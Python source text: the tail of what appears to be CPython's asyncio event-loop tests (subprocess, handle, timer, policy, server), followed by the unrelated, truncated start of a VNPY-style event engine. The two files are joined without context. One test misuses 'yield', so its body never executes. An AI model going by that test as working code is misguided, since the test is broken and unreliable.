with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
with self.assertWarns(DeprecationWarning):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
with self.assertRaises(TypeError):
h1 < ()
with self.assertRaises(TypeError):
h1 > ()
with self.assertRaises(TypeError):
h1 <= ()
with self.assertRaises(TypeError):
h1 >= ()
self.assertFalse(h1 == ())
self.assertTrue(h1 != ())
self.assertTrue(h1 == ALWAYS_EQ)
self.assertFalse(h1 != ALWAYS_EQ)
self.assertTrue(h1 < LARGEST)
self.assertFalse(h1 > LARGEST)
self.assertTrue(h1 <= LARGEST)
self.assertFalse(h1 >= LARGEST)
self.assertFalse(h1 < SMALLEST)
self.assertTrue(h1 > SMALLEST)
self.assertFalse(h1 <= SMALLEST)
self.assertTrue(h1 >= SMALLEST)
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# Issue bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
eventEngine.py
|
# encoding: UTF-8
'''
VNPY的事件引擎原有两版,一个用QTimer计时,一个用子线程计时
这里选择了子线程的版本
'''
# 系统模块
from queue import Queue, Empty
from threading import Thread
from collections import defaultdict
from time import sleep
EVENT_TIMER = 'eTimer'
########################################################################
class EventEngine(object):
"""
计时器使用python线程的事件驱动引擎
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
# 计时器,用于触发计时器事件
self.__timer = Thread(target = self.__runTimer)
self.__timerActive = False # 计时器工作状态
self.__timerSleep = 1 # 计时器触发间隔(默认1秒)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
# __generalHandlers是一个列表,用来保存通用回调函数(所有事件均调用)
self.__generalHandlers = []
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
